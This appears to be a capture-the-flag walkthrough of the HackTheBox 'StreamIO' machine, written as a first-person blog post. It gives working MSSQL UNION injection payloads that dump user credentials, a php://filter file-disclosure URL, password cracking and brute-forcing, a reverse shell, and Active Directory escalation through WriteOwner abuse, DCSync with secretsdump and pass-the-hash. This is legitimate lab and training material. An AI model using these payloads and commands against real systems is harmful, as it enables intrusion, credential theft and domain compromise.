Streamio
So I started with an nmap
doas nmap -sV -sC -vv $ip -oA enum && xsltproc enum.xml -o enum.html && firefox enum.html

We got MS IIS web server, ldap and kerberos ports. There’s also a site hosted on port 443 named streamIO.htb.
I added this to /etc/hosts and checked the website.

It’s a movie site in php(we can tell from index.php), and it’s mostly static from what I can see so fuzzing time.
First a simple fuzzing on directories
ffuf -w $DIRMEDIUM -u 'https://streamio.htb/FUZZ'
I got some hits but they all gave me 403 when I tried to visit them.
At this point I usually stop, and start looking for the initial foothold on the server.
So I tried nxc guest account
nxc smb $ip -u '.' -p '' --sharesBut it didn’t work. I tried brute forcing and getting a TGT, looking for certs, intercepting the hash but nothing worked.
So back to fuzzing
ffuf -c -w .../subdomains-top1million-110000.txt -u 'https://streamio.htb' -H 'Host: FUZZ.streamio.htb'The only hit I got is watch.streamio.htb it has only this field after some trials it only returned the same page despite the input, also the input is never reflected.

So more fuzzing…
ffuf -c -w .../raft-small-files-lowercase.txt -u 'https://watch.steramio.htb/FUZZ' -H 'Host: watch.streamio.htb'Got a few hits, the only that looks interesting is search.php

The search page is functional, it fetches movies from somewhere so it could be vulnerable to SQL injection

So I decided to do a quick test with Turbo Intruder using a special character wordlist

These requests looked interesting, they dumped the whole catalogue of movies

So this confirmed we have sqli, then I tried using union to exfiltrate data but first I needed to match the number of columns

So we confirmed the injection, there are a few helpful payloads in payloadallthings these can be used to confirm the DBMS but…well, it’s easy to guess this will be using mssql.

Using some enumeration payloads I listed the databases along with their tables

So after some research I got this payload
500' UNION SELECT 1, (SELECT STRING_AGG(name, '|') FROM master..sysdatabases), 3, 4, 5, 6;-- -returned the following
master|tempdb|model|msdb|STREAMIO|streamio_backupSo modifying it slightly
500' UNION SELECT 1, (SELECT STRING_AGG(name, '|') FROM streamio..sysobjects WHERE xtype='U'), 3, 4, 5, 6;-- -that returned
movies|usersAnother query to get columns names
500' UNION SELECT 1, (SELECT STRING_AGG(column_name, '|') FROM infomration_schema.columns), 3, 4, 5, 6;-- -
It’s obvious that the last 4 columns belongs to the user table so let’s exfiltrate.
500' UNION SELECT 1, (SELECT STRING_AGG(CONCAT(username, ':', password), '|') FROM users), 3, 4, 5, 6;-- -
Now all users retrieved successfully, I performed some vim magic to have each user on one line and used hashcat to crack the passwords.

Since I got some creds I tried spraying them on smb but it didn’t work

Back to our site, it had a login page so I thought maybe I can try bruteforcing on that.
I decided to go with Turbo Intruder

And it appears that yoshihide is the only hit.

After logging it, I got access to the admin directory that was caught by ffuf at the beginning

So more fuzzing
ffuf -k -w .../seclists/Discovery/Web-Content/burp-paramtere-names.txt -u "https://streamio.htb/admin/?FUZZ=id" -H "Cookie: ..." -fs 1678
debug is a new hit

I was stuck at this point, so I checked ippsec’s walkthrough.
After grabbing the index.php file using the following payload
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php
I found these creds, and the reason index.php returned an error

Getting another file which is master.php, this code can be found

Which allows for RCE, so I cooked up a reverse shell payload using revshells.com

…and for some reason it didn’t work, I tried a few payloads but only ConPty worked so will stick with that.
And we have a shell


After a quick enumeration I tried accessing mssql using the creds dumped from index.php. I used sqlcmd.


After cracking the hashes using hashcat, a new password is found which belongs to the user nikk37

And it authenticates

And the user flag is obtained

After uploading SharpHound and running it, I didn’t find anything interesting.
I then tried some attacks kerboroasting, ASREProast, vulnerable certificate templates, but nothing worked; so I looked for a nudge which lead me to run winpeas.exe.
And I found this

So after downloading the file and using firefox_decrypt I got the following passwords

So after some playing around I got the creds in a format for nxc and I got a hit

Unfortunately, no remote access but still could be useful will check in bloodhound

So looking at bloodhound, this is something we can abuse, maybe add nikk37 to the Core Staff group and then move up to Martin who’s an admin.

Utilising the WriteOwner permission, I successfully gave nikk37 the permission to add members to the group and then added it to the group

We can now get the local administrator password

So after logging in using the local admin password, I found this script

which doesn’t say much, only shows that JDgodd has WO: Change Owner Information and it’s an already known info.
Anyways, now we have a local admin we can perform DCSync which was shown in Bloodhound.
So now I ran secretsdump
secretsdump.py 'streamio.htb'/'Administrator':'<local_admin_pass>'@'DC.STREAMIO.HTB'Which gave me a hash for Martin

Using the hash to login
evil-winrm -i streamio.htb -u 'Martin' -H <hash>NOTEWhen copying the hash take the last part after
:.

GG.
References
Some information may be outdated